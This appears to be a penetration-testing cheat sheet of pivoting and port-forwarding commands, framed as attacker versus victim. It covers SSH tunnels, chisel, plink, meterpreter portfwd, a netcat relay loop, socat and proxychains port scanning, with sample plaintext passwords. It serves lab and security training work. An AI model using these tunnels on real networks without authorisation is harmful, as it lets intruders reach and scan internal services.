Port Forwarding
SSH
Local
Attacker > Victim
ssh victim@192.168.1.2 -L 80:127.0.0.1:80 # port
ssh victim@192.168.1.2 -L 80:127.0.0.1:80 -L 81:127.0.0.1:81 # ports
sshpass -p 'P@ssW0rd123' ssh victim@192.168.1.2 -L 80:127.0.0.1:80 # password (one liner)
Remote
Victim > Attacker
service ssh start # run service (attacker machine)
ssh kali@192.168.1.2 -R 80:127.0.0.1:80 # port
ssh kali@192.168.1.2 -R 80:127.0.0.1:80 -R 81:127.0.0.1:81 # ports
sshpass -p 'P@ssW0rd123' ssh kali@192.168.1.2 -R 80:127.0.0.1:80 # password (one liner)
Dynamic
Attacker > Victim
ssh victim@192.168.1.2 -D 1080
# apt install -y proxychains4
# nano /etc/proxychains4.conf
# socks5 127.0.0.1 1080
proxychains -q nmap -sT -p- 127.0.0.1
proxychains -q curl http://127.0.0.1:80
Chisel
attacker@kali:~$ ./chisel server --reverse --port 1234
user@victim:~$ ./chisel client 192.168.1.2:1234 R:80:127.0.0.1:80 # port
user@victim:~$ ./chisel client 192.168.1.2:1234 R:80:127.0.0.1:80 R:81:127.0.0.1:81 # ports
Dynamic
attacker@kali:~$ ./chisel server -p 1234 --reverse
user@victim:~$ ./chisel client 192.168.1.2:1234 R:socks
# apt install -y proxychains4
# nano /etc/proxychains4.conf
# socks5 127.0.0.1 1080
proxychains -q nmap -sT -p- 127.0.0.1
proxychains -q curl http://127.0.0.1:80
Plink
Remote
Victim > Attacker
service ssh start
C:\>plink.exe -l kali -pw 123456 -R 445:127.0.0.1:445 192.168.1.2 # port
C:\>plink.exe -l kali -pw 123456 -R 445:127.0.0.1:445 -R 8080:127.0.0.1:8080 192.168.1.2 # ports
C:\>plink.exe -l kali -pw 123456 -R 445:127.0.0.1:445 192.168.1.2 -P 1234 # other port
Metasploit
127.0.0.1:80 > 0.0.0.0:80
msf6> sessions -i 1
meterpreter> portfwd add -l 80 -p 80 -r 192.168.1.2
meterpreter> portfwd list
Netcat
127.0.0.1:80 > 0.0.0.0:1234
user@victim:~$ while true; do nc -nlktp 1234 -c "nc 127.0.0.1 80" ; done
Socat
127.0.0.1:80 > 0.0.0.0:1234
user@victim:~$ socat TCP-LISTEN:1234,reuseaddr,fork TCP:127.0.0.1:80